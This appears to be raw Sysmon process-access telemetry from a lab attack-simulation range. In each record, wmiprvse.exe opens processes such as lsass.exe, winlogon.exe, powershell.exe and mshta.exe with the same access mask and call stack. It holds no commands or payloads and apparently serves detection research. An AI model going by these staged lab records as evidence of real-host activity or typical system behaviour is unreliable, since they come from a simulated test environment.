15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.617{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 